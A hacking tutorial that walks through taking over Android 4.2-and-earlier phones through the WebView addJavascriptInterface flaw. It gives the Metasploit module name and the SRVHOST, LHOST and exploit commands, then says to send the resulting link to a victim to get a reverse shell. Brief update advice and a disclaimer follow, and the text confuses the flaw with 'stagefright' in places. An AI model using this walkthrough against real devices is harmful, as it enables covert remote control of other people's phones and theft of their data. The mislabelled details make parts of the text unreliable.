How to hack android phones with a simple link

Hacking Android is not difficult but it is tricky. Today we are going to a unique hack tutorial that exploits the WebView (WebView Exploit) and JavaScript vulnerability allowing hackers to hack an android device with a single link. We are going to demonstrate a remote exploit hack to take control of an android device with a single click of a malicious link which allows the hacker to get a reverse shell. This exploit is commonly known as the WebView exploit. It exploits a vulnerability in android WebView, which exists in version 2.1 to 4.2 (jellybean). Do note this vulnerability works only when WebView is active and is used to open the malicious link. This is active by default in all android phones having stock browsers.

---

---

How can a hacker use this JavaScript and WebView exploit?

This hack exploits a privilege escalation issue in Android version 4.2 and lowers having
WebView component vulnerability that allows untrusted JavaScript code to be executed by a WebView that has one or more JavaScript Interfaces added to it.

The untrusted JavaScript code can call into the Java Reflection APIs exposed by the Interface and execute arbitrary commands which can give remote access and shells to hackers.

Some distributions of the Android Browser app have an “addJavascriptInterface” call tacked on, and thus are vulnerable to remote code execution(RCE). The Browser app in android is known to be vulnerable to this exploit.

A hacker can now send the victim a malicious link, and if the victim is vulnerable, the device will get a reverse shell back to the attacker. This is basically how hackers hack android phones.

 So without any further ado lets start hacking with WebView exploit. 

Hacking android with a single link (WebView and JavaScript exploit)

Step 1: Start your Kali Linux machine.

Start your Kali Linux machine and open Metasploit console.

Step 2: Set Metasploit server for using the WebView exploit

To set up Metasploit type the following commands in msf console:

use exploit/android/browser/webview_addjavascriptinterface

Then type: set SRVHOST 192.168.182.136 (your IP here)

after that type the following: set URIPATH /

lastly set you host IP address: set lhost 192.168.182.136 (your IP here)

then type: exploit

Step 3: Exploit the victim having stagefright vulnerability

Now that the webview exploit is running. Send the malicious link to the victim to hack an android device with a link.

In my case, the link is: http://192.168.182.136:8080/

Note: This attack works only on limited android devices with vulnerable WebView API.

Step 4: Enjoy the hack.

Once the victim clicks on the malicious link, their android device will be hacked. And you can control it remotely with the webview exploit. This is how easy it is to hack an android device with a link.

---

How do I protect myself from hackers using this hack?

Check if your device is vulnerable. Use the Norton exploit security app to check if your device is vulnerable to exploits.

— UPDATE YOUR DEVICE: This bug has been long fixed make sure you update your android device so that you are not vulnerable to the WebView vulnerability. Also, update your browser.

— CHANGE YOUR ANDROID DEVICE: Buy a new device with the latest updates. Buy an android one device

— OFFICIAL PLAYSTORE: Only install apps from the official play store. Do not open unknown links and files which you do not trust.

---

Commonly asked questions about hacking android devices with stagefright exploit:

Q1) Does it work on all phones?

No, only phones with an android version jellybean and below.

Q2) It’s not working on my kali machine?

Update Kali Linux and try again. Try repeating all the steps. If you get a specific error, then mention it in the comment section.

Q3) I want to hack my girlfriend’s phone with WebView exploit. Tell me how?

This type of request is not accepted. Kindly use this article only for educational purposes. Do not misuse the knowledge of hacking with WebView exploit.